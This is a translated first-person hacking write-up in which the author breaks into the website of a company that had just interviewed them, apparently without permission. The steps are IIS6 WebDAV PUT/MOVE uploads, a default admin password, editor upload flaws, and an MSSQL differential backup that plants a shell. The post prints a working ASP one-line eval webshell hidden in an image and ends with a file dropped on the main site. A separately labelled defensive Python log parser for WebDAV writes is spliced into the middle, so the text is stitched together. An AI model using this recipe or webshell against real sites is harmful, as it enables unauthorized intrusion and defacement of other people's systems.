Four days ago a company called me for an interview, so I looked at the company's website and wanted to check its security. I found that the whole site is Flash. I spent half a day with Google's site: search and still could not tell what language it was written in (in the end I found it was plain HTML). That did not help either. I went straight to JSKY, and one scan found the IIS6 PUT vulnerability (which has since been fixed and was not saved). This vulnerability is very old and used to be common on IIS5, but finding it now felt like a stroke of luck; I thought my luck was good, but wait and you will see how sad it gets. I uploaded test.txt directly and was told it succeeded. Then a MOVE, which also reported success. Then I got excited, visited the file, and got a 404.
After a while I came back to it and tried again. I uploaded files, but testing the upload manually did not work; I think it must have been blocked by the firewall.
I was wondering why the tool worked but doing it by hand did not. On Baidu I once saw an article by Lao Jun, "IIS write permission reuse", which mentioned an environment problem; specifically, you can submit the packets with NC. However, after testing, this still failed, and I do not know whether it is a technical problem or a problem with my method. (I still have not solved it, but I think it is the wall.) Instead I posted a question to 3est. The village chief uploaded a txt file and could not find the asp path he provided. This problem has been fixed at 3est. So I decided to change my approach.
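The write-then-rename sequence described above (a WebDAV PUT of a .txt followed by a MOVE) leaves a clear trail in IIS logs. The following is an added example, not code from the original post, that parses constructed IIS W3C log lines and flags accepted WebDAV write methods and the PUT/MOVE pairing; the log lines, IPs and paths are made up for illustration.

```python
"""Flag WebDAV write activity (PUT/MOVE and friends) in IIS W3C-format logs."""
from collections import namedtuple

# Constructed sample log; the #Fields line gives the column order, as IIS writes it.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2012-03-01 10:01:02 10.0.0.5 GET /index.html - 80 - 203.0.113.7 Mozilla/5.0 200 0 0
2012-03-01 10:01:09 10.0.0.5 OPTIONS / - 80 - 203.0.113.7 scanner/1.0 200 0 0
2012-03-01 10:01:10 10.0.0.5 PUT /test.txt - 80 - 203.0.113.7 scanner/1.0 201 0 0
2012-03-01 10:01:11 10.0.0.5 MOVE /test.txt - 80 - 203.0.113.7 scanner/1.0 201 0 0
2012-03-01 10:01:12 10.0.0.5 GET /test.asp - 80 - 203.0.113.7 scanner/1.0 404 0 2
2012-03-01 10:02:00 10.0.0.5 PUT /upload/a.txt - 80 - 198.51.100.9 curl/7.0 403 0 0
"""

# WebDAV methods that modify content; none of them should be reachable anonymously.
WRITE_METHODS = {"PUT", "MOVE", "COPY", "DELETE", "PROPPATCH", "MKCOL"}
Finding = namedtuple("Finding", "time client method uri status")


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def find_webdav_writes(text, success_only=True):
    """Return findings for write methods. With success_only, keep only 2xx responses,
    i.e. requests the server actually accepted rather than rejected (403 etc.)."""
    out = []
    for row in parse_w3c(text):
        method = row.get("cs-method", "")
        status = int(row.get("sc-status", 0))
        if method in WRITE_METHODS and (not success_only or 200 <= status < 300):
            out.append(Finding(row["time"], row["c-ip"], method, row["cs-uri-stem"], status))
    return out


def put_then_move(findings):
    """Pair an accepted PUT with a later MOVE of the same path by the same client:
    the write-then-rename pattern used to turn a harmless .txt into a script file."""
    puts = {(f.client, f.uri) for f in findings if f.method == "PUT"}
    return [f for f in findings if f.method == "MOVE" and (f.client, f.uri) in puts]
```

The MOVE's Destination header is not in the default log fields, so the pairing is the signal to act on; a 201 to PUT from an anonymous client is itself a misconfiguration worth alerting on.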
Scanning showed that every program on the server is the same .NET CMS, and the back end looks like the back end of phpcms2008. What to do with that? This is a set of programs they developed themselves; I have no zero-day for it and no way in. As for the password, most of the sites do not have one, and then luck struck again: the default is admin. Haha, back on top again, so I got to work looking for an upload. After half a day I found an FCK editor, and while looking at the FCK editor I saw Jacks online and sent it to him. After continuous testing, no Trojans could be uploaded; they are all intercepted by the firewall.
<%@ LANGUAGE="JAVASCRIPT" CODEPAGE="65001" %>
<%
var lcx = {'name': Request.Form('#'), 'Gender': eval, 'age': '18', 'nickname': 'Please call me the boss'};
lcx.Gender(lcx.name + '');
%>
Merged into an image.
I had never used this Trojan before. I found that it would not connect with the kitchen knife (China Chopper) client; the prompt was 500. Later I found it is not meant to connect with the kitchen knife at all; it has to be linked with the ice fox client. Finally I also tested the link with the ice fox client, and it sent back an error message. Speechless. Change approach again.
Before entering the back end I had seen a soo upload tool, but had never used it. This time I tested the tool and uploaded the asp file directly; it prompted success, but the path could not be found. Unfortunately I had no choice but to use a packet capture tool. I was ready to be discouraged when I failed to find the path, but on reflection I was not: I published the post directly to the front end to see if any path showed up. Unexpectedly, the Trojan's path can be found on the front end, but access still gives a 404. It's a tragedy. Why? It must have been blocked by the firewall or killed by the antivirus. We tried N of them and every one was a 404. A tragedy. At this point I suddenly thought of the editor again, and guessed again.
Here I am using editone.asp. This is a normal editor, and the firewall was done for. Haha.
I logged in directly and got such poor permissions. Then I uploaded the Trojan through the editor, trying all kinds of one-sentence Trojans. It really is an abnormal wall. I thought about it and remembered lake2's webadmin 2.y. I decided to go to the official website.
The space had expired, and Baidu was no help either. Something came up at that time, so I went out and put the idea down for the moment.
In the afternoon I posted this question to the group for discussion. jacks gave me an idea: for a .NET program, consider an MSSQL differential backup. Right, why didn't I think of that? Ah, I had been struggling to upload and write files, and every road was blocked. It seems I have to ask the big shots for advice. I logged into the editor and created a new 1.php file, then clicked open. An error containing "www.2cto.com" was returned.
Got the path.
The shell is the result of the differential backup. It is a one-sentence asp shell.
However, the permissions are quite large, and the entire server can be browsed. It seems security is not done very well.
I really want to despise them. At the interview they also asked me how to set up permissions. It seems the interviewer was only half competent. They said they would tell me within a week after the interview. It seems that was a brush-off, and no phone call came. Heh.
Then I found the main site, guessed, and found the main site's path. Directly dropped the last txt on the Flash site..
At this point the intrusion ended. Having seen that the WS component had been deleted and sa had been downgraded, privilege escalation will not be involved. Whenever sa gets freed up.
This article has no technical content; it is a common practice. I think the idea is what matters most. I hope this article helps you.
Source: Root Security Team http://root-sec.org/thread-501-1-1.html